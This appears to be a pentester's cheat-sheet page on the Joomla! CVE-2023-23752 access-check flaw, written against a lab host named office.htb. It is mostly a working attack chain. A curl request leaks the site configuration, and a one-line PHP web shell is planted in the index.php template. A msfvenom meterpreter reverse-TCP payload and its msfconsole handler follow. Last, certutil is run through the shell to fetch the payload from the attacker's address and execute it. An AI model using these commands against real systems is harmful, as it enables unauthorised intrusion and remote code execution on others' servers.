Joomla!

CVE-2023-23752

On February 16, 2023, Joomla! published a security advisory for CVE-2023-23752. The advisory describes an “improper access check” affecting Joomla! 4.0.0 through 4.2.7. The following day, a chinese-language blog shared the technical details of the vulnerability. The blog describes an authentication bypass that allows an attacker to leak privileged information. If an attacker can log into the Joomla! administrative web interface, as the Super User, the attacker has easy path to execute arbitrary code.

For Information Disclosure, run the following command. 

curl 'http://office.htb/api/index.php/v1/config/application?public=true' | jp

For RCE, run the following steps. Save it after you modify the index.php template. 

<?php if (isset($_GET['cmd'])) system($_GET['cmd']); ?> 
# Meterpreter version

# Create a meterpreter exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f exe -o shell1234.exe

# Set up a handler for meterpreter
sudo msfconsole -q -x "use exploit/multi/handler;set PAYLOAD windows/x64/meterpreter/reverse_tcp;set AutoRunScript post/windows/manage/migrate;set LHOST 10.10.14.9;set LPORT 1234;run -j"

# Run the following commands after updating the index.php. 
Kali> curl -k 'http://office.htb/?cmd=certutil%20-urlcache%20-split%20-f%20http://10.10.14.9/shell1234.exe'
Kali> curl -k 'http://office.htb/?cmd=.\shell1234.exe'
PreviousTomcatNextSoftware

Last updated